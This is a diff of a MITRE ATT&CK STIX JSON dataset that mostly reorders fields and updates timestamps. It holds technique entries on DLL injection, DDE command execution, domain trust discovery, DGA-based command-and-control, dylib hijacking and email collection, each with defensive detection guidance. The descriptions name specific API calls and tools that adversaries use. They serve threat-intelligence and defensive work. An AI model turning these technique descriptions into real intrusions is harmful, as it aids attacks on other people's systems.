- "id": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "initial-access"
- }
- ],
- "modified": "2020-03-23T21:08:40.063Z",
- "created": "2020-03-13T20:21:54.758Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -7976,19 +8330,19 @@
],
"modified": "2020-03-25T20:51:30.829Z",
"created": "2020-02-11T19:05:02.399Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). ",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
"x_mitre_data_sources": [
"Authentication logs",
"API monitoring",
"DLL monitoring"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -8038,23 +8392,23 @@
"phase_name": "command-and-control"
}
],
- "modified": "2020-03-14T23:29:19.581Z",
+ "modified": "2020-06-20T20:53:20.398Z",
"created": "2020-03-14T23:29:19.581Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_contributors": [
- "Matt Kelly, @breakersall"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)",
"x_mitre_data_sources": [
"SSL/TLS inspection",
"Packet capture"
],
- "x_mitre_detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blacklist or whitelist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_contributors": [
+ "Matt Kelly, @breakersall"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -8195,16 +8549,12 @@
],
"modified": "2020-03-12T14:45:22.784Z",
"created": "2020-03-10T17:44:59.787Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_contributors": [
- "Ryan Benson, Exabeam",
- "Barry Shteiman, Exabeam",
- "Sylvain Gil, Exabeam"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)",
"x_mitre_data_sources": [
"DNS records",
"Netflow/Enclave netflow",
@@ -8212,12 +8562,16 @@
"Packet capture",
"Process use of network"
],
- "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Ryan Benson, Exabeam",
+ "Barry Shteiman, Exabeam",
+ "Sylvain Gil, Exabeam"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -8243,31 +8597,33 @@
],
"modified": "2020-03-12T19:07:53.043Z",
"created": "2020-02-21T21:15:06.561Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
- "id": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0",
- "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)",
- "name": "Domain Trust Discovery",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2019-02-14T16:15:05.974Z",
+ "modified": "2020-03-26T16:13:21.085Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
],
+ "type": "attack-pattern",
"external_references": [
{
"source_name": "mitre-attack",
@@ -8300,15 +8656,13 @@
"description": "Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019."
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-26T16:13:21.085Z",
- "created": "2019-02-14T16:15:05.974Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Domain Trust Discovery",
+ "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)",
+ "id": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0",
"x_mitre_version": "1.1",
"x_mitre_permissions_required": [
"User"
@@ -8365,7 +8719,21 @@
],
"modified": "2020-03-29T23:48:15.056Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.2",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
+ "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS",
+ "SaaS"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.\n\nNetwork intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.\n\nDetecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
"x_mitre_data_sources": [
"Packet capture",
"Network device logs",
@@ -8374,21 +8742,7 @@
"Network intrusion detection system",
"SSL/TLS inspection"
],
- "x_mitre_detection": "Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.\n\nNetwork intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.\n\nDetecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Windows",
- "Linux",
- "macOS",
- "SaaS"
- ],
- "x_mitre_contributors": [
- "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
- "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -8465,20 +8819,20 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T15:32:06.115Z",
+ "modified": "2020-06-20T22:06:47.115Z",
"created": "2020-03-16T15:23:30.896Z",
- "x_mitre_defense_bypassed": [
- "Process whitelisting"
+ "x_mitre_platforms": [
+ "macOS"
],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_detection": "Objective-See's Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. ",
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring"
],
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_detection": "Objective-See's Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. ",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_defense_bypassed": [
+ "Application control"
]
},
{
@@ -8537,6 +8891,22 @@
"created": "2018-01-16T16:13:52.465Z"
},
{
+ "created": "2020-02-12T14:10:50.699Z",
+ "modified": "2020-03-28T19:32:56.572Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d",
+ "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nMicrosoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).",
+ "name": "Dynamic Data Exchange",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -8584,22 +8954,6 @@
"source_name": "NVisio Labs DDE Detection Oct 2017"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Dynamic Data Exchange",
- "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nMicrosoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).",
- "id": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-28T19:32:56.572Z",
- "created": "2020-02-12T14:10:50.699Z",
"x_mitre_platforms": [
"Windows"
],
@@ -8616,6 +8970,22 @@
]
},
{
+ "created": "2020-03-10T17:28:11.747Z",
+ "modified": "2020-03-27T20:54:28.560Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b",
+ "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)",
+ "name": "Dynamic Resolution",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -8643,22 +9013,6 @@
"description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Dynamic Resolution",
- "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)",
- "id": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
- ],
- "modified": "2020-03-27T20:54:28.560Z",
- "created": "2020-03-10T17:28:11.747Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -8680,6 +9034,13 @@
]
},
{
+ "id": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Endgame Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+ "name": "Dynamic-link Library Injection",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -8697,13 +9058,6 @@
"source_name": "Endgame HuntingNMemory June 2017"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Dynamic-link Library Injection",
- "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Endgame Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary ).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ",
- "id": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -8715,7 +9069,7 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-02-21T22:32:05.210Z",
+ "modified": "2020-06-20T22:17:59.148Z",
"created": "2020-01-14T01:26:08.145Z",
"x_mitre_platforms": [
"Windows"
@@ -8733,7 +9087,7 @@
"API monitoring"
],
"x_mitre_defense_bypassed": [
- "Process whitelisting",
+ "Application control",
"Anti-virus"
]
},
@@ -8820,28 +9174,28 @@
],
"modified": "2020-03-27T12:04:37.823Z",
"created": "2020-01-30T14:40:20.187Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "root"
],
- "x_mitre_contributors": [
- "Jimmy Astle, @AstleJimmy, Carbon Black",
- "Erika Noerenberg, @gutterchurl, Carbon Black"
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.",
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
+ "x_mitre_contributors": [
+ "Jimmy Astle, @AstleJimmy, Carbon Black",
+ "Erika Noerenberg, @gutterchurl, Carbon Black"
],
- "x_mitre_effective_permissions": [
- "root"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"external_references": [
@@ -8882,20 +9236,20 @@
],
"modified": "2020-03-26T15:27:58.933Z",
"created": "2020-02-21T21:08:33.237Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"Office 365 account logs",
"Process monitoring",
"Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
]
},
{
@@ -8927,7 +9281,18 @@
],
"modified": "2020-03-24T18:31:06.417Z",
"created": "2017-05-31T21:31:25.454Z",
- "x_mitre_version": "2.1",
+ "x_mitre_contributors": [
+ "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ],
+ "x_mitre_detection": "There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
"x_mitre_data_sources": [
"Office 365 trace logs",
"Mail server",
@@ -8937,18 +9302,7 @@
"Process monitoring",
"Process use of network"
],
